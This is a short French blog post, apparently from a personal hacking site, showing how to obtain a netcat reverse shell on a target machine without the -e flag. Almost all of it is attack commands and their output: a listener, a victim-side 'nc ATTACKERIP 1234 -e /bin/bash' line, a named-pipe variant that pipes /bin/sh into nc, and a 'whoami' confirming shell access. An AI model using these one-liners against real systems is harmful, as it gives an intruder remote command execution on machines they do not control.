Netcat reverse shell sans -e !

By KrustyHack / a couple of years ago

On commence l’écoute

Sur sa machine on écoute:

╭─root@krustyhack ~ 
╰─➤ nc -nvlp 1234
╭─root@krustyhack ~ 
╰─➤ Listening on [0.0.0.0] (family 0, port 1234)

Netcat avec -e

Sur la machine cible on parle:

╭─victim@krustyhack ~ 
╰─➤ nc ATTACKERIP 1234 -e /bin/bash

Netcat sans -e

Sur la machine cible on parle:

╭─victim@krustyhack ~ 
╰─➤ mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc localhost 1234 1>/tmp/backpipe

Resultat final

Accès ouvert, un petit « whoami »:

╭─root@krustyhack ~ 
╰─➤ Connection from [127.0.0.1] port 1234 [tcp/*] accepted (family 2, sport 51143)
whoami
krustyhack

Leave a comment: